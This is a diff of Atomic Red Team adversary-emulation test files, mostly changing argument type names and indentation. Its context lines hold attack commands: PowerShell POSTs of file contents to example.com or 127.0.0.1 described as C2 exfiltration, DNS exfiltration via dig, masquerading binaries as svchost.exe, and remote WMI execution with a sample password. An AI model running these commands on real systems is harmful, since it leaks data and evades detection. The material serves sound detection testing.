@@ -29,4 +29,3 @@ atomic_tests:
cleanup_command: |
rm #{file_to_pad}
name: sh
atomics/T1027.002/T1027.002.yaml
+4 -5
View File
@@ -11,7 +11,7 @@ atomic_tests:
input_arguments:
bin_path:
description: Packed binary
type: Path
type: path
default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx
executor:
command: |
@@ -31,7 +31,7 @@ atomic_tests:
input_arguments:
bin_path:
description: Packed binary
type: Path
type: path
default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed
executor:
command: |
@@ -49,7 +49,7 @@ atomic_tests:
input_arguments:
bin_path:
description: Packed binary
type: Path
type: path
default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx
executor:
command: |
@@ -69,7 +69,7 @@ atomic_tests:
input_arguments:
bin_path:
description: Packed binary
type: Path
type: path
default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed
executor:
command: |
@@ -77,4 +77,3 @@ atomic_tests:
cleanup_command: |
rm /tmp/packed_bin
name: sh
atomics/T1027.004/T1027.004.yaml
+6 -7
View File
@@ -11,11 +11,11 @@ atomic_tests:
input_arguments:
output_file:
description: Output compiled binary
type: Path
type: path
default: C:\Windows\Temp\T1027.004.exe
input_file:
description: C# code that launches calc.exe from a hidden cmd.exe Window
type: Path
type: path
default: PathToAtomicsFolder\T1027.004\src\calc.cs
dependency_executor_name: powershell
dependencies:
@@ -44,7 +44,7 @@ atomic_tests:
input_arguments:
input_file:
description: exe program containing dynamically compiled C# code
type: Path
type: path
default: PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe
dependency_executor_name: powershell
dependencies:
@@ -69,7 +69,7 @@ atomic_tests:
input_arguments:
input_file:
description: source file
type: Path
type: path
default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.c
dependency_executor_name: sh
dependencies:
@@ -94,7 +94,7 @@ atomic_tests:
input_arguments:
input_file:
description: source file
type: Path
type: path
default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc
dependency_executor_name: sh
dependencies:
@@ -119,7 +119,7 @@ atomic_tests:
input_arguments:
input_file:
description: source file
type: Path
type: path
default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.go
dependency_executor_name: sh
dependencies:
@@ -133,4 +133,3 @@ atomic_tests:
command: |
go run #{input_file}
name: bash
atomics/T1027/T1027.yaml
+14 -14
View File
@@ -14,7 +14,7 @@ atomic_tests:
input_arguments:
shell_command:
description: command to encode
type: String
type: string
default: "echo Hello from the Atomic Red Team && uname -v"
dependency_executor_name: sh
dependencies:
@@ -44,7 +44,7 @@ atomic_tests:
input_arguments:
powershell_command:
description: PowerShell command to encode
type: String
type: string
default: Write-Host "Hey, Atomic!"
executor:
command: |
@@ -65,15 +65,15 @@ atomic_tests:
input_arguments:
registry_key_storage:
description: Windows Registry Key to store code
type: String
type: string
default: HKCU:Software\Microsoft\Windows\CurrentVersion
powershell_command:
description: PowerShell command to encode
type: String
type: string
default: Write-Host "Hey, Atomic!"
registry_entry_storage:
description: Windows Registry entry to store code under key
type: String
type: string
default: Debug
executor:
command: |
@@ -96,7 +96,7 @@ atomic_tests:
input_arguments:
url_path:
description: url to download Exe
type: Url
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip
dependency_executor_name: powershell
dependencies:
@@ -126,19 +126,19 @@ atomic_tests:
input_arguments:
input_file:
description: Path of the XLSM file
type: Path
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
sender:
description: sender email
type: String
type: string
default: test@corp.com
receiver:
description: receiver email
type: String
type: string
default: test@corp.com
smtp_server:
description: SMTP Server IP Address
type: String
type: string
default: 127.0.0.1
executor:
command: |
@@ -154,11 +154,11 @@ atomic_tests:
input_arguments:
input_file:
description: Path of the XLSM file
type: Path
type: path
default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
ip_address:
description: Destination IP address
type: String
type: string
default: 127.0.0.1
executor:
command: |
@@ -185,11 +185,11 @@ atomic_tests:
input_arguments:
remote_file:
description: URL of file to download
type: Url
type: url
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
local_path:
description: Local path/filename to save the dowloaded file to
type: Path
type: path
default: Atomic-license.txt
executor:
steps: |
atomics/T1030/T1030.yaml
+2 -3
View File
@@ -11,11 +11,11 @@ atomic_tests:
input_arguments:
file_name:
description: File name
type: Path
type: path
default: T1030_urandom
folder_path:
description: Path where the test creates artifacts
type: Path
type: path
default: /tmp/T1030
dependency_executor_name: sh
dependencies:
@@ -31,4 +31,3 @@ atomic_tests:
cleanup_command: |
if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
name: sh
atomics/T1033/T1033.yaml
+1 -1
View File
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
computer_name:
description: Name of remote computer
type: String
type: string
default: localhost
executor:
command: |
atomics/T1036.003/T1036.003.yaml
+21 -22
View File
@@ -87,11 +87,11 @@ atomic_tests:
input_arguments:
outputfile:
description: path of file to execute
type: Path
type: path
default: ($env:TEMP + "\svchost.exe")
inputfile:
description: path of file to copy
type: Path
type: path
default: PathToAtomicsFolder\T1036.003\bin\T1036.003.exe
dependency_executor_name: powershell
dependencies:
@@ -119,11 +119,11 @@ atomic_tests:
input_arguments:
outputfile:
description: path of file to execute
type: Path
type: path
default: ($env:TEMP + "\svchost.exe")
inputfile:
description: path of file to copy
type: Path
type: path
default: $env:ComSpec
executor:
command: |
@@ -162,32 +162,32 @@ atomic_tests:
input_arguments:
exe_path:
description: path to exe to use when creating masquerading files
type: Path
type: path
default: C:\Windows\System32\calc.exe
vbs_path:
description: path of vbs to use when creating masquerading files
type: Path
type: path
default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs
ps1_path:
description: path of powershell script to use when creating masquerading files
type: Path
type: path
default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.ps1
dependency_executor_name: powershell
dependencies:
- description: |
File to copy must exist on disk at specified location (#{vbs_path})
prereq_command: |
if (Test-Path #{vbs_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}"
- description: |
File to copy must exist on disk at specified location (#{ps1_path})
prereq_command: |
if (Test-Path #{ps1_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}"
- description: |
File to copy must exist on disk at specified location (#{vbs_path})
prereq_command: |
if (Test-Path #{vbs_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}"
- description: |
File to copy must exist on disk at specified location (#{ps1_path})
prereq_command: |
if (Test-Path #{ps1_path}) {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}"
executor:
command: |
copy #{exe_path} %temp%\T1036.003_masquerading.docx.exe /Y
@@ -219,4 +219,3 @@ atomic_tests:
del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1
del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1
name: command_prompt
atomics/T1036.005/T1036.005.yaml
+5 -5
View File
@@ -6,12 +6,12 @@ atomic_tests:
description: |
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)
supported_platforms:
- macos
- linux
- macos
- linux
input_arguments:
test_message:
description: Test message to echo out to the screen
type: String
type: string
default: Hello from the Atomic Red Team test T1036.005#1
executor:
name: sh
@@ -32,7 +32,7 @@ atomic_tests:
input_arguments:
executable_filepath:
description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility.
type: String
type: string
default: $Env:windir\Temp\svchost.exe
executor:
command: |
@@ -43,7 +43,7 @@ atomic_tests:
}
}
'@ -OutputAssembly "#{executable_filepath}"
Start-Process -FilePath "#{executable_filepath}"
cleanup_command: |
Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore
atomics/T1036/T1036.yaml
+41 -41
View File
@@ -1,41 +1,41 @@
attack_technique: T1036
display_name: "Masquerading"
atomic_tests:
- name: System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
supported_platforms:
- windows
executor:
command: |-
copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5
stop-process -name "cmd" | out-null
cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue
name: powershell
- name: Malware Masquerading and Execution from Zip File
auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
supported_platforms:
- windows
input_arguments:
url:
description: Location of zip file
type: Url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
dependencies:
- description: Zip file must be present.
prereq_command: |
if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
cd $env:userprofile\Downloads\T1036
cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
name: powershell
attack_technique: T1036
display_name: "Masquerading"
atomic_tests:
- name: System File Copied to Unusual Location
auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
supported_platforms:
- windows
executor:
command: |-
copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe"
start-process "$env:allusersprofile\cmd.exe"
sleep -s 5
stop-process -name "cmd" | out-null
cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue
name: powershell
- name: Malware Masquerading and Execution from Zip File
auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc
description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
supported_platforms:
- windows
input_arguments:
url:
description: Location of zip file
type: url
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
dependencies:
- description: Zip file must be present.
prereq_command: |
if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
cd $env:userprofile\Downloads\T1036
cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
cleanup_command: |-
taskkill /IM Calculator.exe /f >$null 2>$null
Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
name: powershell
atomics/T1037.001/T1037.001.yaml
+3 -3
View File
@@ -11,11 +11,11 @@ atomic_tests:
input_arguments:
script_path:
description: Path to .bat file
type: String
type: string
default: '%temp%\art.bat'
script_command:
description: Command To Execute
type: String
type: string
default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt
executor:
command: |
@@ -25,4 +25,4 @@ atomic_tests:
REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1
del #{script_path} >nul 2>&1
del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1
name: command_prompt
name: command_prompt
atomics/T1039/T1039.yaml
+32 -32
View File
@@ -1,5 +1,5 @@
attack_technique: T1039
display_name: Data from Network Shared Drive
display_name: Data from Network Shared Drive
atomic_tests:
- name: Copy a sensitive File over Administive share with copy
auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660
@@ -10,31 +10,31 @@ atomic_tests:
- windows
input_arguments:
remote:
description: Remote server name
description: Remote server name
type: string
default: '127.0.0.1'
share_file:
description: Remote Path to the file
type: Path
type: path
default: Windows\temp\Easter_Bunny.password
local_file:
description: Local name
type: string
default: 'Easter_egg.password'
default: 'Easter_egg.password'
dependency_executor_name: powershell
dependencies:
- description: |
Administrative share must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host 'Please Enable "C$" share on #{remote}'
- description: |
"\\#{remote}\C$\#{share_file}" must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
get_prereq_command: |
Out-File -FilePath "\\#{remote}\C$\#{share_file}"
- description: |
Administrative share must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host 'Please Enable "C$" share on #{remote}'
- description: |
"\\#{remote}\C$\#{share_file}" must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
get_prereq_command: |
Out-File -FilePath "\\#{remote}\C$\#{share_file}"
executor:
command: |-
copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file}
@@ -52,31 +52,31 @@ atomic_tests:
- windows
input_arguments:
remote:
description: Remote server name
description: Remote server name
type: string
default: '127.0.0.1'
share_file:
description: Remote Path to the file
type: Path
type: path
default: Windows\temp\Easter_Bunny.password
local_file:
description: Local name
type: string
default: 'Easter_egg.password'
default: 'Easter_egg.password'
dependency_executor_name: powershell
dependencies:
- description: |
Administrative share must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host 'Please Enable "C$" share on #{remote}'
- description: |
"\\#{remote}\C$\#{share_file}" must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
get_prereq_command: |
Out-File -FilePath "\\#{remote}\C$\#{share_file}"
- description: |
Administrative share must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1}
get_prereq_command: |
Write-Host 'Please Enable "C$" share on #{remote}'
- description: |
"\\#{remote}\C$\#{share_file}" must exist on #{remote}
prereq_command: |
if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1}
get_prereq_command: |
Out-File -FilePath "\\#{remote}\C$\#{share_file}"
executor:
command: |-
copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}"
@@ -84,4 +84,4 @@ atomic_tests:
Remove-Item -Path "\\#{remote}\C$\#{share_file}"
Remove-Item -Path "$Env:TEMP\#{local_file}"
name: powershell
elevation_required: true
elevation_required: true
atomics/T1040/T1040.yaml
+84 -86
View File
@@ -12,16 +12,16 @@ atomic_tests:
input_arguments:
interface:
description: Specify interface to perform PCAP on.
type: String
type: string
default: ens33
dependency_executor_name: bash
dependencies:
- description: |
Check if at least one of tcpdump or tshark is installed.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
- description: |
Check if at least one of tcpdump or tshark is installed.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
executor:
command: |
tcpdump -c 5 -nnni #{interface}
@@ -39,16 +39,16 @@ atomic_tests:
input_arguments:
interface:
description: Specify interface to perform PCAP on.
type: String
type: string
default: en0A
dependency_executor_name: bash
dependencies:
- description: |
Check if at least one of tcpdump or tshark is installed.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
- description: |
Check if at least one of tcpdump or tshark is installed.
prereq_command: |
if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi;
get_prereq_command: |
(which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark)
executor:
command: |
sudo tcpdump -c 5 -nnni #{interface}
@@ -67,40 +67,38 @@ atomic_tests:
input_arguments:
interface:
description: Specify interface to perform PCAP on.
type: String
type: string
default: Ethernet
wireshark_url:
description: wireshark installer download URL
type: Url
type: url
default: https://1.eu.dl.wireshark.org/win64/Wireshark-win64-latest.exe
tshark_path:
description: path to tshark.exe
type: Path
description: path to tshark.exe
type: path
default: c:\program files\wireshark\tshark.exe
npcap_url:
description: npcap installed download URL
type: Url
type: url
default: https://nmap.org/npcap/dist/npcap-1.31.exe
npcap_path:
description: path to npcap.sys
type: Path
type: path
default: C:\Program Files\Npcap\npcap.sys
dependency_executor_name: powershell
dependencies:
- description: |
tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
prereq_command:
if (test-path "#{tshark_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
Start-Process $env:temp\wireshark_installer.exe /S
- description: |
npcap must be installed.
prereq_command:
if (test-path "#{npcap_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
Start-Process $env:temp\npcap_installer.exe
- description: |
tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
Start-Process $env:temp\wireshark_installer.exe /S
- description: |
npcap must be installed.
prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1}
get_prereq_command: |
Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url}
Start-Process $env:temp\npcap_installer.exe
executor:
command: |
"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
@@ -138,8 +136,8 @@ atomic_tests:
cleanup_command: |-
del %TEMP%\t1040.etl
name: command_prompt
elevation_required: true
elevation_required: true
- name: Windows Internal pktmon set filter
auto_generated_guid: 855fb8b4-b8ab-4785-ae77-09f5df7bff55
description: |-
@@ -163,24 +161,24 @@ atomic_tests:
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
type: String
type: string
default: en0
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_macos_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
exit 1
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
exit 1
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -i #{ifname} -t 3
@@ -197,24 +195,24 @@ atomic_tests:
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
type: String
type: string
default: en0
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_macos_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
exit 1
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
exit 1
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -f -i #{ifname} -t 3
@@ -231,20 +229,20 @@ atomic_tests:
input_arguments:
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_linux_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -a -t 3
@@ -261,20 +259,20 @@ atomic_tests:
input_arguments:
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_linux_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -4 -p 6 -t 3
@@ -292,20 +290,20 @@ atomic_tests:
input_arguments:
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_linux_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -4 -P -p 17 -t 3
@@ -323,20 +321,20 @@ atomic_tests:
input_arguments:
csource_path:
description: Path to C program source
type: String
type: string
default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c
program_path:
description: Path to compiled C program
type: String
type: string
default: /tmp/t1040_linux_pcapdemo
dependency_executor_name: bash
dependencies:
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
- description: |
compile C program
prereq_command: |
if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi
get_prereq_command: |
cc #{csource_path} -o #{program_path}
executor:
command: |
sudo #{program_path} -a -f -t 3
atomics/T1041/T1041.yaml
+8 -8
View File
@@ -10,18 +10,18 @@ atomic_tests:
input_arguments:
destination_url:
description: Destination URL to post encoded data.
type: String
type: string
default: example.com
filepath:
description: The file which is being exfiltrated to the C2 Server.
type: Path
type: path
default: $env:TEMP\LineNumbers.txt
executor:
command: |
if(-not (Test-Path #{filepath})){
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
if(-not (Test-Path #{filepath})){
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
name: powershell
atomics/T1046/T1046.yaml
+14 -14
View File
@@ -13,7 +13,7 @@ atomic_tests:
input_arguments:
host:
description: Host to scan.
type: String
type: string
default: 192.168.1.1
executor:
command: |
@@ -31,15 +31,15 @@ atomic_tests:
input_arguments:
host:
description: Host to scan.
type: String
type: string
default: 192.168.1.1
port:
description: Ports to scan.
type: String
type: string
default: "80"
network_range:
description: Network Range to Scan.
type: String
type: string
default: 192.168.1.0/24
dependency_executor_name: sh
dependencies:
@@ -76,11 +76,11 @@ atomic_tests:
input_arguments:
nmap_url:
description: NMap installer download URL
type: Url
type: url
default: https://nmap.org/dist/nmap-7.80-setup.exe
host_to_scan:
description: The host to scan with NMap
type: String
type: string
default: 127.0.0.1
dependency_executor_name: powershell
dependencies:
@@ -104,20 +104,20 @@ atomic_tests:
input_arguments:
host_ip:
description: Host to scan.
type: String
type: string
default: 127.0.0.1
filename:
description: Location of the project file
type: Path
type: path
default: PathToAtomicsFolder\T1046\src\T1046.py
dependency_executor_name: powershell
dependencies:
- description: |
Check if python exists on the machine
prereq_command: |
if (python --version) {exit 0} else {exit 1}
get_prereq_command: |
echo "Python 3 must be installed manually"
- description: |
Check if python exists on the machine
prereq_command: |
if (python --version) {exit 0} else {exit 1}
get_prereq_command: |
echo "Python 3 must be installed manually"
executor:
command: |
python #{filename} -i #{host_ip}
atomics/T1047/T1047.yaml
+13 -13
View File
@@ -47,11 +47,11 @@ atomic_tests:
input_arguments:
node:
description: Ip Address
type: String
type: string
default: 127.0.0.1
service_search_string:
description: Name Of Service
type: String
type: string
default: Spooler
executor:
command: |
@@ -67,7 +67,7 @@ atomic_tests:
input_arguments:
process_to_execute:
description: Name or path of process to execute.
type: String
type: string
default: notepad.exe
executor:
command: |
@@ -86,19 +86,19 @@ atomic_tests:
input_arguments:
node:
description: Ip Address
type: String
type: string
default: 127.0.0.1
user_name:
description: Username
type: String
type: string
default: DOMAIN\Administrator
password:
description: Password
type: String
type: string
default: P@ssw0rd1
process_to_execute:
description: Name or path of process to execute.
type: String
type: string
default: notepad.exe
executor:
command: |
@@ -132,11 +132,11 @@ atomic_tests:
input_arguments:
new_class:
description: Derived class name
type: String
type: string
default: Win32_Atomic
process_to_execute:
description: Name or path of process to execute.
type: String
type: string
default: notepad.exe
executor:
name: powershell
@@ -158,15 +158,15 @@ atomic_tests:
input_arguments:
node:
description: Ip Address
type: String
type: string
default: 127.0.0.1
dll_to_execute:
description: Path to DLL.
type: String
type: string
default: $env:TEMP\calc.dll
function_to_execute:
description: Name of DLL function to call
type: String
type: string
default: StartW
dependency_executor_name: powershell
dependencies:
@@ -192,7 +192,7 @@ atomic_tests:
default: 127.0.0.1
product:
description: Enter the product name being uninstalled. This will default to TightVNC.
type: String
type: string
default: Tightvnc
dependency_executor_name: powershell
dependencies:
atomics/T1048.002/T1048.002.yaml
+9 -9
View File
@@ -1,23 +1,23 @@
attack_technique: T1048.002
display_name: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
atomic_tests:
- name: Exfiltrate data HTTPS using curl windows
- name: Exfiltrate data HTTPS using curl windows
auto_generated_guid: 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0
description: |
Exfiltrate data HTTPS using curl to file share site file.io
supported_platforms:
- windows
- windows
input_arguments:
input_file:
description: Test file to upload
type: Path
type: path
default: PathToAtomicsFolder/T1048.002/src/artifact
curl_path:
description: path to curl.exe
type: Path
type: path
default: C:\Windows\System32\Curl.exe
dependency_executor_name: powershell
dependencies:
dependency_executor_name: powershell
dependencies:
- description: |
Curl must be installed on system.
prereq_command: |
@@ -45,12 +45,12 @@ atomic_tests:
description: |
Exfiltrate data HTTPS using curl to file share site file.io
supported_platforms:
- macos
- linux
- macos
- linux
input_arguments:
input_file:
description: Test file to upload
type: Path
type: path
default: PathToAtomicsFolder/T1048.002/src/artifact
executor:
name: bash
atomics/T1048.003/T1048.003.yaml
+28 -28
View File
@@ -37,11 +37,11 @@ atomic_tests:
input_arguments:
input_file:
description: Path to file to be exfiltrated.
type: Path
type: path
default: C:\Windows\System32\notepad.exe
ip_address:
description: Destination IP address where the data should be sent.
type: String
type: string
default: 127.0.0.1
executor:
command: |
@@ -64,57 +64,57 @@ atomic_tests:
xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
3. Once the data is received, use the below command to recover the data.
cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
name: manual
- name: Exfiltration Over Alternative Protocol - HTTP
auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c
description: |
Exfiltration of specified file over HTTP.
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
Exfiltration of specified file over HTTP.
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
supported_platforms:
- windows
executor:
command: |
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
$content = Get-Content #{input_file}
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
name: powershell
input_arguments:
input_file:
description: Path to file to exfiltrate
type: Path
